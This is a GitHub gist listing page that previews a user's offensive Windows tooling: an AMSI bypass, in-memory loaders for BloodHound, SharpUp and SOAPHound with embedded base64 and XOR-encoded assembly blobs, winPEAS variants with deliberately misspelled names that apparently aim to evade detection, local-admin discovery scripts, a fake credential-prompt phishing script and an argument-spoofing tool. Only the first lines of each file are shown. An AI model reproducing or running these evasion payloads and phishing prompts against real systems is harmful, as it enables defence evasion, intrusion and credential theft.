an0nud4y An0nUD4Y
An0nUD4Y
/ Program.cs
Created
January 10, 2026 16:49
— forked from wavvs/Program.cs
AMSI bypass via HAMSICONTEXT corruption (Windows 11 supported)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Collections.Generic; | |
| using System.Linq; | |
| using System.Text; | |
| using System.Threading.Tasks; | |
| using System.Runtime.InteropServices; | |
| using System.Reflection; | |
| using System.Diagnostics; | |
| using System.Threading; | |
| using System.IO; |
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invok-BloodHond | |
| { | |
| <# | |
| .SYNOPSIS | |
| Runs the BloodHound C# Ingestor using reflection. The assembly is stored in this file. | |
| .DESCRIPTION | |
| Using reflection and assembly.load, load the compiled BloodHound C# ingestor into memory |
An0nUD4Y
/ Invke-SharpUpp.ps1
Created
March 28, 2025 04:14
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invke-SharpUpp | |
| { | |
| [CmdletBinding()] | |
| Param ( | |
| [String] | |
| $Command = "" | |
| ) |
An0nUD4Y
/ winPEES.ps1
Last active
March 28, 2025 04:50
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $Key = 0x42 | |
| $EncodedString = "fmFIbBEbDA0SEQsRSGJiEi01JzARKicuLmIjJiMyNiM2Ky0sYi0kYhUrLBIHAxFsJzonYm1iFSssEicjMWwgIzZIbAYHEQEQCxIWCw0MSGJiBC0wYjYqJ2IuJyUjLmInLDcvJzAjNistLGItJGI1KywmLTUxYiAjMScmYiEtLzI3NicwMWI2KiM2YjstN2InKzYqJzBiLTUsYi0wYiMwJ2IjMjIwLTQnJmI2LWIwNyxiNiorMWIxITArMjZiLSxIbAcaAw8SDgdIYmJhYgYnJCM3LjZib2IsLTAvIy5iLTInMCM2Ky0sYjUrNipiNzEnMCwjLydtMiMxMTUtMCZiIzcmKzZiKyxiJjArNCcxbTAnJSsxNjA7SGJibB41KywSJyMxbDIxc0hIYmJhYgssIS43JidiBzohJy5iJCsuJzFiKyxiMScjMCEqeGJsOi4xbmJsOi4xOm5ibDouMS9IYmJsHjUrLBInIzFsMjFzYm8HOiEnLkhIYmJhYgQ3Li5iIzcmKzZib2IsLTAvIy5iLTInMCM2Ky0sYjUrNipiAxILMWJtYgknOzFibWIWLSknLDFIYmJhYWIWKisxYjUrLi5iMjAtJjchJ2IkIy4xJ2IyLTErNis0JzFiYWFiSGJibB41KywSJyMxbDIxc2JvBDcuLgEqJyEpYkhIYmJhYgMmJmIWKy8nYjE2Iy8yMWI2LWInIyEqYiEtLy8jLCZIYmJsHjUrLBInIzFsMjFzYm8WKy8nETYjLzJISGwMDRYHEUhiYhQnMDErLSx4YmJiYmJiYmJiYmJiYmJiYmJiYmJzbHFIYmISBwMREW8sJWINMCslKywjLmIDNzYqLTB4YmJiEgcDERFvLCVIYmI1KywSBwMRbDIxc2IDNzYqLTB4YmJiYmJiYmJiAhAjLCYtLjIqAS0sLic7SGJiATAnIzYrLSxiBiM2J3hiYmJiYmJiYmJiYmJiYnNybXZtcHJwcEhiYhUnIDErNi |
An0nUD4Y
/ PEESWIN.ps1
Last active
March 28, 2025 03:58
— forked from S3cur3Th1sSh1t/Invoke-winPEAS.ps1
winPEAS in powershell
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invke-winPEES | |
| { | |
| [CmdletBinding()] | |
| Param ( | |
| [Parameter(Position = 0, Mandatory = $true)] | |
| [ValidateNotNullorEmpty()] | |
| [String] | |
| $Command | |
| ) |
An0nUD4Y
/ Find-WMILocalAdminAccess.ps1
Created
December 19, 2024 12:40
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Find-WMILocalAdminAccess | |
| { | |
| <# | |
| .SYNOPSIS | |
| Use this script tp search for local admin access on machines in a domain or local network. | |
| .DESCRIPTION | |
| This function simply runs a WMI command against the sepcified list of computers. Since, by-default, | |
| we need local administrative access on a computer to run WMI commands, a success for this fucntions | |
| means local administrative access. |
An0nUD4Y
/ Find-PSRemotingLocalAdminAccess.ps1
Last active
December 19, 2024 12:39
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Find-PSRemotingLocalAdminAccess { | |
| <# | |
| .SYNOPSIS | |
| Use this script to search for local admin access on machines in a domain or local network. | |
| .DESCRIPTION | |
| This function simply runs a PowerShell Remoting command against the specified list of computers. Since, by default, | |
| we need local administrative access on a computer to run WMI commands, a success for this function | |
| means local administrative access. |
An0nUD4Y
/ Invoke-SOAPHound.ps1
Created
December 3, 2024 07:20
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-SOAPHound | |
| { | |
| $a=New-Object IO.MemoryStream(,[Convert]::FromBAsE64String("H4sIAAAAAAAEAOy9B1gUx//4v7d37DXacXj0ogIed4AKiigWVEDsXbFXbBEX9+wIdo1GjR019hZ778ZeoqLG2CuWaKKJMYkxJjb8z3vK3h1gPp9/8v09z+/5PV8f2Z15zXveM/PemdmZ2dm9xu1ncEqO41To78MHjtvLkX9J3H/+Nxr9uYfsd+d2as+X3qtodL50qz59baFZkthb6pYZ2qPbgAHioNDuGaHS4AGhfQeEJjdtGZop9syIcXPThVEdzVI4rpFCya20NJzG9N7nyij0igooMxqO0xB26DpyhDKJJOLmSb7hn8CCQrWYwz8l13UCx3ni//azfML/eiK9bXGiGm6VS0ml1HKu6Hj6moZL+C9sIv8LlbOO/2mQP83BHzMoY9ggdD6xh5YLysoXU9E1RrJJPZAb5w3lERd0v8ZJLgn9j5Ey+otI0JXmGes6UkyuTtFsLrtOZCBvPOfCdd0ocH0sPLIdz1VGqe29wHFr75ZomBL/+ZtHqTjBEsxnK9DFsZThlTnYgQDPAE+BkgElBSoGVBS4MOBCgcCAQIGaATUFGgY0FGgZ0FKgY0BHgZ4BPQWuDLhS4MaAGwXuDLhT4MGABwFmVEidxT/Xk3hH47N/roF6DcTrRb1exGukXnzmOGMFdD1QnpABDRI6ZOlM01AxFXrsccVHN75qM6g5ZmQhnVEwCL7tUlAUbg/6q4r+jCiwCT2HoLMLdbO/c8if4A4aTGYBVKgN6pABMT3RMSumfsJLtXNIz5hBOKRdwi0IkdCVyzIjl67afFB0EkO9DLcB3Iqhjwxxkl9gGCnDeJSxhIkYJsrwIkgOxLChDB+jNBM6YthBhnWRLRLqYdhNhuNAMhY5pWxsr+VgQl9swnCTdBn5VoT7SHfhrJd+A2MmtEGVRKqiAOl26KjzY9I2BZGehM++0m |
An0nUD4Y
/ windows_credential_phish.ps1
Created
September 23, 2024 06:46
Prompts a dialog to enter user credentials then validates them and prints on console.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # POC from greg.foss[at]owasp.org | |
| # @enigma0x3 | |
| # Adapted from http://blog.logrhythm.com/security/do-you-trust-your-computer/ | |
| # https://enigma0x3.wordpress.com/2015/01/21/phishing-for-credentials-if-you-want-it-just-ask/ | |
| function Invoke-Prompt { | |
| [CmdletBinding()] | |
| Param ( | |
| [Switch] $ProcCreateWait, |
An0nUD4Y
/ ArgSpoof.cpp
Last active
June 6, 2024 18:50
Interactive Command Line Argument Spoofing (WIP)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tp ArgSpoof.cpp /link /OUT:ArgSpoof.exe /SUBSYSTEM:CONSOLE | |
| */ | |
| #include <iostream> | |
| #include <Windows.h> | |
| #include <winternl.h> | |
| #include <wchar.h> | |
| #include <locale.h> | |
| #include <stdlib.h> | |
| #include <stdio.h> |
NewerOlder